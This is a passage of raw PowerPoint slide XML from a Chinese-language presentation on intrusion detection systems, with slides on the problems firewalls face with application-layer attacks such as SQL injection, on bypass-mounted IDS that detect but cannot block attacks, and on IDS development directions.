            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>面临的问题</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3069501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示 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88AE03B6-E153-8222-3F7F-2501CE597B3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2217822485"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1524000" y="1299030"/>
          <a:ext cx="9144000" cy="5018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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6ED4A89-E87F-4291-B3ED-D7A0E0B84A14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>5.2 IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发展方向</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="62099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17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC0CDA7F-37CC-F4B4-BF7E-17F1836CD80B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1576389" y="2997201"/>
            <a:ext cx="2725737" cy="3311525"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4921"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="00ADDC">
                  <a:tint val="50000"/>
                  <a:satMod val="300000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="35000">
                <a:srgbClr val="00ADDC">
                  <a:tint val="37000"/>
                  <a:satMod val="300000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="00ADDC">
                  <a:tint val="15000"/>
                  <a:satMod val="350000"/>
                </a:srgbClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="16200000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00ADDC">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69" name="Line 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0624FA26-90F9-6ED8-E5A4-07CB06CCA4CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3738564" y="4787900"/>
            <a:ext cx="465137" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00CC00"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="70" name="Object 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA2D1AB-4074-D33E-9D74-6D200D327588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3371851" y="4356100"/>
          <a:ext cx="720725" cy="1231900"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s5202" name="Visio" r:id="rId4" imgW="282245" imgH="445618" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="282245" imgH="445618" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="70" name="Object 84">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCA2D1AB-4074-D33E-9D74-6D200D327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851" y="4356100"/>
                        <a:ext cx="720725"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Text Box 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51B71378-720D-1871-2A09-0F68058CFB82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1524001" y="5654675"/>
            <a:ext cx="2544763" cy="603250"/>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defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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70%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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攻击在应用层产生</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"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服务漏洞攻击、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注入等</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="Line 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B294EC82-E3EA-5291-4E15-78A7F7B49CD3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3375026" y="5221288"/>
            <a:ext cx="295275" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Line 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{54801D8B-CC33-E3CB-3C5F-4C16C0107C38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3375026" y="4787900"/>
            <a:ext cx="295275" cy="1588"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="00CC00"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:round/>
            <a:headEnd type="oval" w="med" len="med"/>
            <a:tailEnd type="oval" w="med" len="med"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="AutoShape 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FB16AFE-B1B3-9851-A036-72BC2449ADFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2706688" y="5076826"/>
            <a:ext cx="671512" cy="288925"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
              <a:gd name="adj2" fmla="val 63676"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FF0000"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="CCE8CF"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;30%</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" kern="0">
              <a:solidFill>
                <a:sysClr val="windowText" lastClr="000000"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE5F3569-8CFC-AE5A-32E2-7B0FBF7F1BD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1976438" y="4645026"/>
            <a:ext cx="1401762" cy="288925"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100000"/>
              <a:gd name="adj2" fmla="val 63738"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00CC00"/>
          </a:solidFill>
          <a:ln w="9525" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00CC00"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" kern="0">
                <a:solidFill>
                  <a:sysClr val="window" lastClr="CCE8CF"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&gt;70%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="76" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D5D3F9EC-35DD-025E-7237-486DFF03D000}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1581150" y="4356101"/>
            <a:ext cx="1133644" cy="264047"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="93000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPct val="15000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="hlink"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1"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L7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1"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（应用层）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D35D12C-B32B-CC68-00E9-4AD4E24AA17F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1487487" y="5084764"/>
            <a:ext cx="1328738" cy="274637"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1"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L2-L4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1"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（网络层）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="AutoShape 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92AA9DAA-CE6C-0963-958F-1B7AC32A9290}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1843089" y="3112821"/>
            <a:ext cx="2192337" cy="943511"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00ADDC"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="00ADDC">
                <a:shade val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>攻击层次越来越高，超过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>70%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000"/>
                  </a:outerShdw>
                </a:effectLst>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的应用层攻击防火墙无法拦截</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="79" name="AutoShape 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F05BD6F9-4635-C514-F7A1-30486F38E81C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4381500" y="2038351"/>
            <a:ext cx="2725738" cy="3311525"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5141"/>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80" name="AutoShape 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A77DC94C-9236-AACC-26C0-9A14486830E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4646613" y="2144365"/>
            <a:ext cx="2195512" cy="1223070"/>
          </a:xfrm>
          <a:prstGeom prst="foldedCorner">
            <a:avLst>
              <a:gd name="adj" fmla="val 12500"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="7FD13B"/>
          </a:solidFill>
          <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="7FD13B">
                <a:shade val="50000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>位于旁路的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>，虽然能有效检测和告警入侵事件，但无法直接阻断攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D6F4E58-C7B4-FC77-6021-A71D9D487AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5345113" y="3513139"/>
            <a:ext cx="798512" cy="752475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="63500" sx="102000" sy="102000" algn="ctr" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="Text Box 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D72030AD-D886-7E59-E1AE-05D0A5A9C2FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5800725" y="3376614"/>
            <a:ext cx="1261884" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pP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②</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检测到攻击</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="AutoShape 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB6BA7CD-EEAD-E5EE-EBF1-F2DEF979B5EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
